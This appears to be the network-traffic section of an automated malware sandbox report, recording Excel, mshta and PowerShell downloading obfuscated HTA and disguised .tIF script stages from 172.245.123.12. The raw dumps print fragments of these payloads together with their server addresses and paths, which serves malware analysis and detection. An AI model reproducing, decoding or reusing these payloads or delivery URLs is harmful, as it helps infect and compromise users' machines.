                                                            Dec 2, 2024 07:28:53.176768064 CET192.168.2.228.8.8.80x950bStandard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.312069893 CET192.168.2.228.8.8.80x950bStandard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.458235025 CET192.168.2.228.8.8.80x950bStandard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.581429958 CET192.168.2.228.8.8.80x950bStandard query (0)linkjago.meA (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:29:08.610340118 CET192.168.2.228.8.8.80xf019Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:29:09.021282911 CET192.168.2.228.8.8.80x4529Standard query (0)1016.filemail.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 2, 2024 07:28:48.714484930 CET8.8.8.8192.168.2.220xd210No error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:48.714484930 CET8.8.8.8192.168.2.220xd210No error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.311192036 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.311192036 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.446382999 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.446382999 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.581152916 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.581152916 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.704273939 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.97.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:28:53.704273939 CET8.8.8.8192.168.2.220x950bNo error (0)linkjago.me188.114.96.6A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:29:08.992193937 CET8.8.8.8192.168.2.220xf019No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 2, 2024 07:29:08.992193937 CET8.8.8.8192.168.2.220xf019No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false
                                                            Dec 2, 2024 07:29:09.156227112 CET8.8.8.8192.168.2.220x4529No error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 2, 2024 07:29:09.156227112 CET8.8.8.8192.168.2.220x4529No error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • linkjago.me
                                                            • 1016.filemail.com
                                                            • 172.245.123.12

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249164172.245.123.12803280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            TimestampBytes transferredDirectionData
                                                            Dec 2, 2024 07:28:51.367079973 CET356OUTGET /361/sen/seemebestgoodluckthings.hta HTTP/1.1
                                                            Accept: */*
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 172.245.123.12
                                                            Connection: Keep-Alive
                                                            Dec 2, 2024 07:28:52.587946892 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 02 Dec 2024 14:28:52 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 01:53:32 GMT
                                                            ETag: "26f35-6283fd0da12d9"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 159541
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/hta
                                                            Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 53 63 72 69 70 74 25 32 35 32 30 4c 61 6e 67 75 61 67 65 25 32 35 33 44 25 32 35 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 35 32 37 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 32 30 48 54 4d 4c 25 32 35 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 35 32 30 70 72 6f 76 69 64 65 64 25 32 35 32 30 62 79 25 32 35 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 35 32 30 2d 2d 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 25 32 35 32 35 34 34 25 32 35 32 35 34 46 25 32 35 32 35 34 33 25 32 35 32 35 35 34 25 32 35 32 35 35 39 25 32 35 32 35 35 30 25 32 35 32 35 34 35 25 [TRUNCATED]
                                                            Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%2525
                                                            Dec 2, 2024 07:28:52.588083029 CET224INData Raw: 33 43 25 32 35 32 35 37 33 25 32 35 32 35 34 33 25 32 35 32 35 37 32 25 32 35 32 35 34 39 25 32 35 32 35 35 30 25 32 35 32 35 37 34 25 32 35 32 35 32 30 25 32 35 32 35 34 43 25 32 35 32 35 36 31 25 32 35 32 35 36 45 25 32 35 32 35 34 37 25 32 35
                                                            Data Ascii: 3C%252573%252543%252572%252549%252550%252574%252520%25254C%252561%25256E%252547%252575%252541%252547%252565%25253D%252522%252576%252562%252573%252563%252552%252549%252570%252574%252522%25253E%25250A%252544%252569%25254D%2525
                                                            Dec 2, 2024 07:28:52.588104010 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                            Dec 2, 2024 07:28:52.588241100 CET224INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                            Dec 2, 2024 07:28:52.588251114 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                            Dec 2, 2024 07:28:52.588263035 CET224INData Raw: 37 25 32 35 32 35 36 41 25 32 35 32 35 34 45 25 32 35 32 35 36 42 25 32 35 32 35 34 33 25 32 35 32 35 35 38 25 32 35 32 35 36 37 25 32 35 32 35 37 34 25 32 35 32 35 34 31 25 32 35 32 35 35 35 25 32 35 32 35 36 36 25 32 35 32 35 36 44 25 32 35 32
                                                            Data Ascii: 7%25256A%25254E%25256B%252543%252558%252567%252574%252541%252555%252566%25256D%25254B%25256A%25254D%252565%252571%252569%252544%252578%252550%252571%25254F%25256E%252576%252541%25256B%25256B%25256B%252545%252556%252574%25255
                                                            Dec 2, 2024 07:28:52.588726997 CET1236INData Raw: 35 25 32 35 32 35 36 35 25 32 35 32 35 35 36 25 32 35 32 35 36 41 25 32 35 32 35 37 33 25 32 35 32 35 36 45 25 32 35 32 35 35 41 25 32 35 32 35 37 39 25 32 35 32 35 36 37 25 32 35 32 35 37 30 25 32 35 32 35 36 33 25 32 35 32 35 35 36 25 32 35 32
                                                            Data Ascii: 5%252565%252556%25256A%252573%25256E%25255A%252579%252567%252570%252563%252556%25256C%252559%252578%25254A%25256D%25256E%252551%25256E%25254C%252575%252555%25254A%252548%25256C%252552%252554%252572%252546%252544%25256F%252541%25256D%252546%252
                                                            Dec 2, 2024 07:28:52.588736057 CET224INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                            Dec 2, 2024 07:28:52.588903904 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                            Dec 2, 2024 07:28:52.588922977 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                            Dec 2, 2024 07:28:52.708091021 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                            Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.2249166172.245.123.12803600C:\Windows\System32\mshta.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 2, 2024 07:28:55.855807066 CET433OUTGET /361/sen/seemebestgoodluckthings.hta HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: fr-FR
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Range: bytes=9228-
                                                            Connection: Keep-Alive
                                                            Host: 172.245.123.12
                                                            If-Range: "26f35-6283fd0da12d9"
                                                            Dec 2, 2024 07:28:57.061110020 CET1236INHTTP/1.1 206 Partial Content
                                                            Date: Mon, 02 Dec 2024 14:28:56 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 01:53:32 GMT
                                                            ETag: "26f35-6283fd0da12d9"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 150313
                                                            Content-Range: bytes 9228-159540/159541
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/hta
                                                            Data Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 [TRUNCATED]
                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                            Dec 2, 2024 07:28:57.061130047 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25254C%252566%252576%25256F%25254E%25254F%25256C%252544%252555%252545%252578%25256B%252573%252572%252559%252542%252554%25257A%25254D%252550%252545%252565%252556
                                                            Dec 2, 2024 07:28:57.061136007 CET1236INData Raw: 38 25 32 35 32 35 34 34 25 32 35 32 35 35 41 25 32 35 32 35 35 39 25 32 35 32 35 34 41 25 32 35 32 35 36 41 25 32 35 32 35 34 42 25 32 35 32 35 37 36 25 32 35 32 35 35 35 25 32 35 32 35 36 45 25 32 35 32 35 34 36 25 32 35 32 35 37 32 25 32 35 32
                                                            Data Ascii: 8%252544%25255A%252559%25254A%25256A%25254B%252576%252555%25256E%252546%252572%25256F%252551%252564%252552%252578%252544%25256C%25257A%252575%252568%252576%252571%252559%252546%252553%25254D%252546%252564%25257A%252561%25257A%25254A%252569%252
                                                            Dec 2, 2024 07:28:57.061142921 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                            Dec 2, 2024 07:28:57.061147928 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                            Dec 2, 2024 07:28:57.061153889 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                            Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                            Dec 2, 2024 07:28:57.061160088 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                            Dec 2, 2024 07:28:57.061460018 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                            Dec 2, 2024 07:28:57.061470985 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                            Dec 2, 2024 07:28:57.061482906 CET1236INData Raw: 38 25 32 35 32 35 35 33 25 32 35 32 35 35 31 25 32 35 32 35 36 44 25 32 35 32 35 37 39 25 32 35 32 35 35 41 25 32 35 32 35 35 30 25 32 35 32 35 37 35 25 32 35 32 35 35 41 25 32 35 32 35 34 46 25 32 35 32 35 34 43 25 32 35 32 35 36 34 25 32 35 32
                                                            Data Ascii: 8%252553%252551%25256D%252579%25255A%252550%252575%25255A%25254F%25254C%252564%252552%252550%252565%252553%252565%25257A%252561%252578%252578%25256B%252548%25257A%252553%25254F%25254F%252546%252568%25256D%25254F%252551%252567%252547%25254B%252
                                                            Dec 2, 2024 07:28:57.181638956 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.2249167172.245.123.12803780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 2, 2024 07:29:02.304585934 CET371OUTGET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1
                                                            Accept: */*
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 172.245.123.12
                                                            Connection: Keep-Alive
                                                            Dec 2, 2024 07:29:03.464901924 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 02 Dec 2024 14:29:02 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 02:06:06 GMT
                                                            ETag: "2597c-6283ffdcaf502"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 153980
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: image/tiff
                                                            Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 64 00 57 00 49 00 4c 00 57 00 4c 00 6f 00 57 00 52 00 75 00 41 00 4c 00 43 00 78 00 42 00 20 00 3d 00 20 00 22 00 7a 00 6c 00 6d 00 6b 00 66 00 62 00 57 00 6d 00 67 00 75 00 70 00 57 00 68 00 4e 00 47 00 22 00 0d 00 0a 00 72 00 6f 00 54 00 69 00 6b 00 6c 00 5a 00 64 00 4c 00 57 00 42 00 74 00 47 00 4b 00 51 00 20 00 3d 00 20 00 22 00 61 00 4c 00 6c 00 65 00 61 00 4b 00 6b 00 4b 00 48 00 63 00 4c 00 5a 00 63 00 63 00 4c 00 22 00 0d 00 0a 00 66 00 50 00 70 00 78 00 6a 00 61 00 4e 00 71 00 52 00 48 00 4b 00 4f 00 74 00 43 00 63 00 20 00 3d 00 20 00 22 00 43 00 6d 00 67 00 57 00 66 00 50 00 6b 00 57 00 52 00 74 00 78 00 67 00 71 00 69 00 73 00 22 00 0d 00 0a 00 0d 00 0a 00 6f 00 63 00 69 00 4c 00 4e 00 55 00 47 00 7a 00 65 00 67 00 4b 00 68 00 4a 00 50 00 4c 00 20 00 3d 00 20 00 22 00 47 00 6b 00 48 00 68 00 6c 00 42 00 4b 00 72 00 49 00 63 00 61 00 69 00 62 00 57 00 66 00 22 00 0d 00 0a 00 75 00 57 00 69 00 57 00 53 00 4c 00 66 00 6e 00 6c 00 6b 00 [TRUNCATED]
                                                            Data Ascii: dWILWLoWRuALCxB = "zlmkfbWmgupWhNG"roTiklZdLWBtGKQ = "aLleaKkKHcLZccL"fPpxjaNqRHKOtCc = "CmgWfPkWRtxgqis"ociLNUGzegKhJPL = "GkHhlBKrIcaibWf"uWiWSLfnlkaiZNO = "obIbKJLoLoiNWoi"LBoWfKmWPhcTicf = "GhLKUiuLbndvakU"dAiARRNLQLkAmqW = "vzbepUIvcACbWLt"NaclRNfuHGxdkUT = "jqWGAGLrzlcajPb"RbdjKcpLzufqIaU = "hPUOePLhoPhUhnK"TeKaNWSeadfLqNi = "nevBdmxWOhPLUBB"xmWPAuPfzaajsUi = "pAZWhoCLLCLbeIW"KvUClfeHZOsWinL = "zUBoSLGiGklWikK"fxlzxL
                                                            Dec 2, 2024 07:29:03.464960098 CET224INData Raw: 00 6b 00 57 00 47 00 52 00 47 00 57 00 70 00 6b 00 43 00 20 00 3d 00 20 00 22 00 4b 00 63 00 4b 00 6c 00 75 00 6e 00 57 00 57 00 4c 00 49 00 47 00 6c 00 71 00 51 00 42 00 22 00 0d 00 0a 00 6c 00 78 00 49 00 48 00 6f 00 5a 00 6d 00 61 00 4c 00 6f
                                                            Data Ascii: kWGRGWpkC = "KcKlunWWLIGlqQB"lxIHoZmaLoWPzLK = "phACjoeCtWWZboG"LltJLGGPtLbGKiA = "LnNLWbhZcSlxmGu"GPLkO
                                                            Dec 2, 2024 07:29:03.464971066 CET1236INData Raw: 00 41 00 43 00 42 00 4c 00 6c 00 4e 00 62 00 65 00 43 00 74 00 20 00 3d 00 20 00 22 00 70 00 4c 00 66 00 74 00 4c 00 6a 00 55 00 7a 00 4e 00 52 00 67 00 41 00 4c 00 4c 00 4f 00 22 00 0d 00 0a 00 57 00 71 00 66 00 57 00 65 00 4b 00 52 00 4c 00 4f
                                                            Data Ascii: ACBLlNbeCt = "pLftLjUzNRgALLO"WqfWeKRLOzqWUeo = "UhndKLBfkkARGHi"gRWomCifAGRcLko = "zNjakcxZpZlrWKo"mCeLuLdUKPAKfbj
                                                            Dec 2, 2024 07:29:03.464987040 CET1236INData Raw: 00 50 00 6b 00 57 00 4e 00 54 00 22 00 0d 00 0a 00 42 00 74 00 6f 00 4c 00 50 00 68 00 4f 00 78 00 68 00 47 00 70 00 6c 00 57 00 4c 00 57 00 20 00 3d 00 20 00 22 00 63 00 4a 00 57 00 43 00 57 00 50 00 6a 00 6f 00 6c 00 57 00 4e 00 6f 00 6d 00 63
                                                            Data Ascii: PkWNT"BtoLPhOxhGplWLW = "cJWCWPjolWNomcR"OmZUuWeoujLcWWe = "mWLkrefIZmWxcKo"mAeLcsJGWfUiOuk = "oipxfsGLKPKZLfS"
                                                            Dec 2, 2024 07:29:03.464998960 CET1236INData Raw: 00 55 00 20 00 3d 00 20 00 22 00 7a 00 63 00 41 00 41 00 57 00 54 00 4b 00 6b 00 47 00 6e 00 71 00 47 00 6c 00 55 00 4b 00 22 00 0d 00 0a 00 4c 00 78 00 76 00 57 00 41 00 48 00 63 00 65 00 69 00 69 00 6d 00 4c 00 43 00 69 00 57 00 20 00 3d 00 20
                                                            Data Ascii: U = "zcAAWTKkGnqGlUK"LxvWAHceiimLCiW = "QbclKtziWZWKiAp"dGZjUJILiiULkxo = "bAdlHGGiKqGeLpa"pkfJLZuibGAqpLI = "Zciem
                                                            Dec 2, 2024 07:29:03.465123892 CET1236INData Raw: 00 0a 00 6d 00 57 00 41 00 4f 00 6b 00 70 00 75 00 6b 00 52 00 6f 00 4c 00 5a 00 5a 00 42 00 4b 00 20 00 3d 00 20 00 22 00 4b 00 65 00 4e 00 62 00 69 00 50 00 4f 00 57 00 4c 00 4c 00 4c 00 69 00 61 00 75 00 70 00 22 00 0d 00 0a 00 55 00 4c 00 4c
